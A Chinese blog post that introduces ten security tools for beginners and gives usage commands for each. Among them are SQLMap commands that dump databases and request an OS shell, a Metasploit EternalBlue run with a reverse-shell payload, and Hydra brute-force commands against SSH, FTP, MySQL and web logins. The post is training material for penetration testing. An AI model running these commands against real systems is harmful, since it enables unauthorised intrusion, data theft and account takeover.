做网络安全,工具就是你的武器。

一把好刀能让你在战场上事半功倍,一套好工具能让你在渗透测试中如虎添翼。

但新手最头疼的就是:工具太多了,到底该用哪个?

今天这篇文章,我从自己用过的上百个网安工具里,精选出10个新手必装的神器。每一个都是我日常高频使用、经过实战检验的好东西。尤其是第3个,用过的人都说封神。
请添加图片描述

建议先收藏,再慢慢装。


第1个:Nmap —— 信息收集的"望远镜"

一句话介绍: 网络扫描之王,渗透测试第一步必用工具。

Nmap(Network Mapper)是网络安全领域最著名的端口扫描工具,没有之一。它可以帮你探测目标主机是否在线、开放了哪些端口、跑的是什么服务、甚至操作系统是什么版本。

新手必学命令:

# 基础扫描(扫描目标开放端口)
nmap 192.168.1.1

# 扫描指定端口
nmap -p 80,443,3306 192.168.1.1

# 全端口扫描(1-65535)
nmap -p- 192.168.1.1

# 服务版本探测(看端口后面跑的是什么软件、什么版本)
nmap -sV 192.168.1.1

# 操作系统探测
nmap -O 192.168.1.1

# 综合扫描(常用参数组合,一步到位)
nmap -sS -sV -O -p- 192.168.1.1

为什么新手必装: 信息收集是渗透测试的第一步,而Nmap是信息收集阶段最核心的工具。你后面学的每一个漏洞利用,前提都是先用Nmap找到目标开放了什么服务。


第2个:Burp Suite —— Web安全的"瑞士军刀"

一句话介绍: Web渗透测试必备神器,抓包改包重放一把梭。

如果说Web安全只能装一个工具,那一定是Burp Suite。它是目前最流行的Web应用安全测试工具,功能强大到离谱:拦截请求、修改参数、重放攻击、漏洞扫描、爬虫、暴力破解……几乎你能想到的Web测试功能它都有。

新手最常用的4个模块:

模块功能使用场景
Proxy(代理)拦截和修改HTTP请求抓包看请求内容、修改参数测试
Repeater(重放器)重放和修改请求手动测试漏洞、反复调整Payload
Intruder(入侵者)自动化攻击暴力破解、模糊测试、批量探测
Decoder(解码器)编码解码转换Base64、URL编码、Hex等转换

新手入门操作:

  1. 浏览器安装SwitchyOmega插件,设置代理为127.0.0.1:8080
  2. 打开Burp Suite,Proxy模块开启拦截
  3. 浏览器访问任意网站,Burp就能抓到请求
  4. 右键发送到Repeater,就可以改参数重放了

为什么新手必装: 做Web安全,你80%的时间都在和HTTP请求打交道。Burp Suite就是你和HTTP之间的桥梁,不会用Burp,等于Web安全还没入门。


第3个:Kali Linux —— 渗透测试的"军火库"

一句话介绍: 预装了600+安全工具的操作系统,网安人的标配系统。

来了,就是这个,第3个,直接封神。

Kali Linux是基于Debian的Linux发行版,专门为数字取证和渗透测试而设计。它最牛的地方在于:预装了600多个安全工具,从信息收集到漏洞利用、从密码破解到无线攻击、从社会工程学到逆向工程,应有尽有。

你不需要一个个去下载安装工具,装完Kali,所有工具都在里面了,开箱即用。

Kali里最常用的工具分类:

信息收集:nmap、whois、dig、theHarvester
漏洞分析:searchsploit、nikto、sqlmap
Web应用:burpsuite、dirb、wpscan
密码攻击:hydra、john、hashcat、crunch
无线攻击:aircrack-ng、reaver
逆向工程:ghidra、radare2
取证工具:autopsy、binwalk、foremost
社会工程学:setoolkit、msfvenom

新手安装建议:

  • 不要直接装物理机,先用VMware虚拟机装,玩熟了再说
  • 内存至少分配4G,硬盘至少50G
  • 装完第一件事:改root密码、更新源、装中文输入法
  • 快照功能一定要用!搞坏了直接回滚,不用重装

为什么说它封神: 一个操作系统,把网安领域90%的工具都给你预装好了,而且全部免费、持续更新。你不需要花时间找工具、配环境,打开就能开始学习和实战。对于新手来说,Kali就是最好的起点,没有之一。


第4个:SQLMap —— SQL注入的"自动化收割机"

一句话介绍: SQL注入自动化利用神器,一条命令拖库不是梦。

SQLMap是一个开源的SQL注入自动化工具,它可以自动检测SQL注入漏洞、自动选择注入技术、自动获取数据库数据,甚至直接拿到服务器权限。

新手必学命令:

# 检测是否存在SQL注入
sqlmap -u "http://target.com/news.php?id=1"

# 获取所有数据库名
sqlmap -u "http://target.com/news.php?id=1" --dbs

# 获取指定数据库的所有表名
sqlmap -u "http://target.com/news.php?id=1" -D database_name --tables

# 获取指定表的所有列名
sqlmap -u "http://target.com/news.php?id=1" -D database_name -T table_name --columns

# 导出指定字段的数据
sqlmap -u "http://target.com/news.php?id=1" -D database_name -T table_name -C username,password --dump

# 一键获取所有数据(拖库)
sqlmap -u "http://target.com/news.php?id=1" --dump-all

# 尝试获取操作系统Shell
sqlmap -u "http://target.com/news.php?id=1" --os-shell

为什么新手必装: SQL注入是Web安全最经典、最常见的漏洞类型,也是新手入门必学的漏洞。SQLMap能帮你把注入过程自动化,让你专注于理解注入原理,而不是手写字节流。但记住:工具是辅助,原理才是根本,一定要先理解SQL注入的原理,再用SQLMap。


第5个:Metasploit —— 漏洞利用的"乐高积木"

一句话介绍: 全球最流行的渗透测试框架,漏洞利用模块多到用不完。

Metasploit Framework(简称MSF)是一个开源的渗透测试框架,它内置了大量的漏洞利用模块、Payload生成器、辅助扫描模块。你可以把它理解成一个漏洞利用的"乐高积木"——选择目标漏洞、选择Payload、设置参数,然后一键执行。

新手必学操作:

# 启动Metasploit控制台
msfconsole

# 搜索漏洞利用模块(以永恒之蓝为例)
search ms17_010

# 使用指定模块
use exploit/windows/smb/ms17_010_eternalblue

# 查看模块需要设置的参数
show options

# 设置目标IP
set RHOSTS 192.168.1.100

# 设置Payload(反弹Shell)
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 设置本机IP(接收反弹连接)
set LHOST 192.168.1.50

# 执行攻击
exploit

为什么新手必装: MSF是内网渗透和主机漏洞利用的核心工具。学会用MSF,你就能复现各种经典漏洞(永恒之蓝、心脏滴血等),理解漏洞利用的完整流程。而且MSF的Meterpreter是最强大的后渗透工具之一,拿到Shell之后的操作几乎全靠它。


第6个:Wireshark —— 网络流量的"显微镜"

一句话介绍: 最强大的网络协议分析器,抓包分析流量的神器。

Wireshark是一个免费开源的网络协议分析器,它可以捕获网络中的数据包,并把数据包的内容详细展示出来。小到TCP三次握手,大到HTTP完整请求,Wireshark都能给你拆解得明明白白。

新手常用功能:

抓包过滤:只抓你想看的流量
  - host 192.168.1.100    只抓指定IP的流量
  - port 80                只抓80端口的流量
  - tcp                    只抓TCP协议
  - http                   只抓HTTP协议

显示过滤:抓完后筛选想看的内容
  - ip.addr == 192.168.1.100
  - tcp.port == 443
  - http.request.method == "POST"

右键追踪流:查看完整的TCP/HTTP会话内容

为什么新手必装: 学网络安全,不懂网络协议等于空中楼阁。Wireshark能让你"看到"网络流量的真实样子,帮你直观理解TCP/IP、HTTP、DNS等协议的工作原理。而且在应急响应和流量分析中,Wireshark是排查攻击痕迹的核心工具。


第7个:Hydra —— 密码爆破的"攻城锤"

一句话介绍: 支持50+协议的在线密码爆破工具,弱口令检测必备。

Hydra(九头蛇)是一个并行化的登录密码爆破工具,支持几乎所有常见的网络协议:SSH、FTP、SMB、RDP、MySQL、HTTP表单、Redis……只要是需要用户名密码登录的服务,Hydra几乎都能爆破。

新手必学命令:

# 爆破SSH
hydra -L user.txt -P pass.txt ssh://192.168.1.100

# 爆破FTP
hydra -L user.txt -P pass.txt ftp://192.168.1.100

# 爆破MySQL
hydra -L user.txt -P pass.txt mysql://192.168.1.100

# 爆破HTTP POST登录表单
hydra -L user.txt -P pass.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=失败"

# 指定线程数(速度更快)
hydra -L user.txt -P pass.txt -t 16 ssh://192.168.1.100

为什么新手必装: 弱口令是内网渗透中最常见、成功率最高的攻击方式之一。很多服务器的SSH、数据库、后台管理系统都在用弱口令(123456、admin、password等)。学会用Hydra爆破弱口令,你在内网中就能快速横向移动。当然,只能在授权环境下使用,未经授权的爆破是违法行为


第8个:Dirsearch —— 目录扫描的"探路者"

一句话介绍: 高速Web目录扫描工具,帮你找到网站隐藏的路径和文件。

Dirsearch是一个用Python写的Web目录扫描工具,它可以通过字典暴力枚举网站的目录和文件,帮你发现后台管理页面、备份文件、配置文件、测试页面等"隐藏"的路径。

新手必学命令:

# 基础扫描
python3 dirsearch.py -u http://target.com

# 指定字典
python3 dirsearch.py -u http://target.com -w /path/to/dict.txt

# 指定扩展名(扫描.php .html .bak等后缀)
python3 dirsearch.py -u http://target.com -e php,html,bak,zip

# 递归扫描(扫描到目录后继续深入)
python3 dirsearch.py -u http://target.com -r

# 指定线程数
python3 dirsearch.py -u http://target.com -t 50

# 排除指定状态码
python3 dirsearch.py -u http://target.com -x 404,403

为什么新手必装: 做Web渗透,信息收集阶段除了端口和服务,Web目录和文件也是重点。很多网站的后台、phpinfo、备份文件、.git泄露都是通过目录扫描发现的。Dirsearch速度快、支持递归、可定制性强,是目录扫描的首选工具。


第9个:SearchSploit —— 漏洞利用的"搜索引擎"

一句话介绍: Exploit-DB的本地搜索工具,找POC和EXP一键搞定。

SearchSploit是Kali自带的一个命令行工具,它把Exploit-DB(全球最大的漏洞利用代码库)的所有内容存在本地,你可以直接在终端搜索漏洞利用代码,不用打开浏览器翻网页。

新手必学命令:

# 搜索漏洞利用代码
searchsploit eternalblue

# 搜索特定软件和版本
searchsploit apache 2.4.49

# 只搜索标题(更精确)
searchsploit -t "sql injection"

# 查看漏洞利用代码的详细信息
searchsploit -x 12345

# 复制漏洞利用代码到当前目录
searchsploit -m 12345

# 更新漏洞库
searchsploit -u

为什么新手必装: 做漏洞复现和渗透测试,你经常需要找某个漏洞的POC或EXP。SearchSploit让你在终端里就能快速搜索和复制漏洞利用代码,效率比浏览器高得多。而且它是离线的,没有网络也能用。


第10个:Notion / 语雀 —— 知识管理的"第二大脑"

一句话介绍: 不是安全工具,但比任何安全工具都重要。

最后一个,我不放工具,放一个笔记软件。

很多新手会问:学网安需要记笔记吗?我的回答是:不但要记,而且要系统地记。

网安知识点多而杂,工具命令、漏洞原理、操作步骤、踩坑经验……如果你不记笔记,学了就忘,等于白学。

我推荐用Notion或者语雀来做知识管理,建立自己的网安知识库:

📁 网络安全知识库
├── 📁 基础知识
│   ├── 计算机网络
│   ├── Linux命令
│   ├── Windows基础
│   └── MySQL数据库
├── 📁 Web安全
│   ├── SQL注入
│   ├── XSS跨站脚本
│   ├── 文件上传漏洞
│   ├── 文件包含漏洞
│   └── 命令执行漏洞
├── 📁 工具使用
│   ├── Nmap
│   ├── Burp Suite
│   ├── SQLMap
│   └── Metasploit
├── 📁 漏洞复现
│   ├── 永恒之蓝MS17-010
│   ├── Log4j漏洞
│   └── 各类CVE复现
└── 📁 学习笔记
    ├── 每日学习记录
    ├── 踩坑经验汇总
    └── 面试题整理

为什么新手必装: 好记性不如烂笔头。每学一个知识点、每复现一个漏洞、每踩一个坑,都记下来。半年后回头看,你会拥有一个属于自己的、独一无二的网安知识库。这比任何教程都值钱,因为它是你亲手实践过的。


结尾

以上10个工具,是我从新手一路走来到现在,每天都在用的核心工具。

最后说一句心里话:工具是手段,不是目的。 不要为了学工具而学工具,工具是用来解决问题的。先理解原理,再用工具提效,这才是正确的顺序。

把这10个工具用熟,你已经超过了80%的网安新手。剩下的,就是持续学习和不断实战了。

请添加图片描述

我把这10个工具的安装包、配置教程、常用命令速查表全部整理好了,还有一份《网安工具大全PDF》,包含50+常用工具的详细使用说明。

需要的朋友,私信我,打包发给你。
在这里插入图片描述

Logo

openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构

更多推荐